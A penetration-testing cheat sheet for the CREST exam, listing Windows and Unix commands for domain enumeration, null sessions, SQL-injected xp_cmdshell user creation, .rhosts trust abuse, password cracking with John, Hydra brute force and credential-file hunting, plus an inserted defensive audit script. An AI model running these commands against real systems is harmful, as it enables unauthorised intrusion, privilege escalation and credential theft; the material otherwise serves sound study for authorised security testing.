CREST CheatSheet

This document provides information on commands and techniques for Windows and Linux/Unix systems. It covers topics such as viewing domain information, adding users, scanning SMB, viewing domain controllers, null sessions, password cracking, SSH key generation, X windows commands, SCP, finger, John the Ripper, Hydra, finding files, SUID/SGID programs, network services configuration, and network mapping. The document serves as a reference guide for penetration testing activities on Windows and Linux/Unix systems.

Uploaded by: fabien.yvan

Windows

Domain:                                                   Comment
  net view                                                list computers on domain
  net view \\<target name/ip>                             list shares on host
  net view /domain                                        list domains
  net view /domain:<domain name>                          list computers on named domain
  net user edward williams /add                           add a user
  net localgroup Administrators edward /add               add to Administrators group
  nbtscan 192.168.226.0/24                                scan the range for NetBIOS/SMB hosts

Domain Controllers:                                       Comment
  nltest /dclist:<domain name>                            list domain controllers
  nltest /dsgetdc:<domain name> /pdc                      more PDC info
  nltest /bdc_query:<domain name>                         BDC info (if any)
  nltest /server:<ip> /trusted_domains                    needs a null session first

Hosts:                                                    Comment
  net use \\<target>\ipc$ "" /u:""                        null session
  nbtstat -a <name> / -A <ip>                             NetBIOS name table and target MAC
  epdump <target>                                         look for IPs in endpoints
  enum -SUPc <target>                                     enumerate shares/users/password policy

SQL:                                                      Comment
  ';Exec xp_cmdshell 'net user <user> <passwd> /add';--   beware of password complexity issues

  sp_configure 'show advanced options', 1                 enable advanced options, then reconfigure
  reconfigure                                             and run the next statement:
  sp_configure 'xp_cmdshell', 1                           this re-enables xp_cmdshell if it has
  reconfigure                                             been turned off

Windows Misc:                                             Comment
  dir filename /s                                         find file called filename in all subdirs
  findstr /S /I "password" *.txt                          find all occurrences of password in text files
  findstr /S /I /M "password" *.txt                       (just print the file names)
  psexec \\192.168.0.1 -s cmd.exe                         null session first
  tasklist /?
  tasklist /svc
  tasklist /FI "USERNAME eq NT AUTHORITY\SYSTEM" /SVC
  then
  sc qc <servicename>

Ed – CREST Notes
Linux / Unix

NFS:                                                      Comment
  showmount -e <target>                                   display exports
  sudo mount -t nfs <target>:/<export> <mount point>      don't forget to mkdir the mount point
  adduser --uid <uid> --gid <gid> <username>              note password policy on local (6+ chars)
  su - <user> and ssh-keygen                              switch user and generate SSH keys


X:                                                        Comment
  xwininfo -tree -root -display <ip>:0 | grep -i term     pipes back the hex id of the window
  xwd -root -display <ip>:0.0 | xwud                      capture screen
  xwd -id <hex value> -display <ip>:0 | xwud              capture a specific window
  xkill -display <ip>:0                                   kill process/window
  x-dumper.sh

SCP:                                                      Comment
  scp file ed@ninja:/home/ed                              copy file to ninja
  scp ed@ninja:/home/ed/file file                         copy file from ninja

Putty Copy:                                               Comment
  pscp.exe ed@192.168.226.162:/home/ed/Desktop/test.txt c:\    copy from SSH host to c:\

Finger:                                                   Comment
  finger -l @target, 0@target, .@target, **@target        long list
  finger (user, admin, ...)@target                        various flaws in finger
  finger '1 2 3 4 5 6 7 8 9 0'@target                     Solaris 8 bug

R Services:                                               Comment
  echo + + > /usr/bin/.rhosts                             look in users' home dirs; check /etc/hosts.equiv

John:                                                     Comment
  unshadow /etc/passwd /etc/shadow > file                 change /etc/john/john.conf to match
  john -i:mode file                                       the minimum password requirements
  john --wordlist=words.txt file

hydra:                                                    Comment
  hydra -e ns -l user -P words.txt -v <ip> smb            bash it

Unix Misc:                                                           Comment
  find . -type f -name '*payroll*' 2>/dev/null                       Solaris find file names (case sensitive)
  find . -type f 2>/dev/null | grep -i 'Payroll'                     Solaris find file names (case insensitive)
  find . -type f -exec grep -i -l 'Payroll' '{}' \; 2>/dev/null      Solaris find file content
  find / -type f -iname '*Payroll*' 2>/dev/null                      Linux find file names
  grep -i -l -r whatever * 2>/dev/null                               Linux find file contents
  find / -type f -exec grep -i -l "password" '{}' \; 2>/dev/null     find files containing "password"
  or: grep -i -l 'password' *
  find / -type f -print 2>/dev/null | grep -i "passwd"               Solaris find, case insensitive
  find / -type f \( -perm -04000 -o -perm -02000 \) 2>/dev/null      SUID / SGID (-o is "or")
  find / -type f -perm -002 2>/dev/null                              world writable
  showrev -p, uname -a, pkginfo -x                                   Solaris patch info
  netstat -nap                                                       list processes and ports (needs sudo)
  lsof -i :port
  lsof -p <pid> -P                                                   (-P gives port)
  ps -ef                                                             list processes
  export PATH=$PATH:/whatever   (bash)                               add path in bash/sh shell; valid for
  PATH=$PATH:/whatever; export PATH   (sh)                           the terminal session only
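The find-based permission and content checks above (SUID/SGID, world-writable, "password" in file contents) and the .rhosts / hosts.equiv check from the R Services section, wrapped as one reusable audit script. This is an added example and not part of Ed's notes: it assumes a POSIX shell with GNU-style find and grep, and the sample tree it builds under mktemp is constructed here purely so the script runs offline (point the functions at / on a real host).

```shell
#!/bin/sh
# Added example, not from the original cheat sheet: each cheat-sheet check
# becomes a function that takes a root directory, so the same one-liners
# can be run as a repeatable audit and diffed against a known-good baseline.

# SUID (04000) or SGID (02000) regular files under the root given as $1.
find_suid_sgid() {
    find "$1" -type f \( -perm -04000 -o -perm -02000 \) 2>/dev/null
}

# World-writable regular files (others have the write bit, 002) under $1.
find_world_writable() {
    find "$1" -type f -perm -002 2>/dev/null
}

# Regular files under $1 whose content matches $2 (case-insensitive),
# using the find -exec grep -i -l form from the cheat sheet.
find_files_containing() {
    find "$1" -type f -exec grep -i -l "$2" '{}' \; 2>/dev/null
}

# Wildcard ("+") entries in .rhosts / hosts.equiv files under $1, printed
# as file:line:text. A "+ +" line trusts every host and every user.
find_permissive_rhosts() {
    find "$1" -type f \( -name .rhosts -o -name hosts.equiv \) 2>/dev/null |
    while read -r f; do
        grep -n '^[[:space:]]*+' "$f" 2>/dev/null | sed "s|^|$f:|"
    done
}

# One report covering all four checks.
audit_report() {
    echo "== SUID/SGID files under $1";      find_suid_sgid "$1"
    echo "== world-writable files under $1"; find_world_writable "$1"
    echo "== files containing 'password'";   find_files_containing "$1" 'password'
    echo "== permissive rhosts/hosts.equiv"; find_permissive_rhosts "$1"
}

# Constructed sample tree (assumption: mktemp, chmod and printf exist, as on
# any POSIX system). Modes are set explicitly so the result does not depend
# on the caller's umask; the credential string is a made-up sample value.
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/usr/bin" "$root/etc" "$root/home/ed" "$root/tmp"
    printf 'bin\n' > "$root/usr/bin/suid_tool";  chmod 4755 "$root/usr/bin/suid_tool"
    printf 'bin\n' > "$root/usr/bin/sgid_tool";  chmod 2755 "$root/usr/bin/sgid_tool"
    printf 'bin\n' > "$root/usr/bin/plain_tool"; chmod 0755 "$root/usr/bin/plain_tool"
    printf 'scratch\n' > "$root/tmp/scratch";    chmod 0666 "$root/tmp/scratch"
    printf 'Password=changeme\n' > "$root/home/ed/notes.txt"
    chmod 0600 "$root/home/ed/notes.txt"
    printf '+ +\n' > "$root/home/ed/.rhosts";    chmod 0600 "$root/home/ed/.rhosts"
    printf 'trusted.example.com\n' > "$root/etc/hosts.equiv"
    chmod 0644 "$root/etc/hosts.equiv"
    echo "$root"
}

# Demo run against the constructed tree; on a real host call audit_report /
demo_root=$(make_sample_tree)
audit_report "$demo_root"
rm -rf "$demo_root"
```

Every check keeps the cheat sheet's `2>/dev/null` on the find side so permission-denied noise from unreadable directories does not hide real hits; on a production host run it with sudo so the walk is complete.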

Network Mapping:                                          Comment
  dig @<nameserver> <domain name> axfr                    zone transfer
  traceroute <target>                                     default UDP (-I ICMP, -T TCP, default port 80)
  ping -R <target>                                        record route, read from bottom up
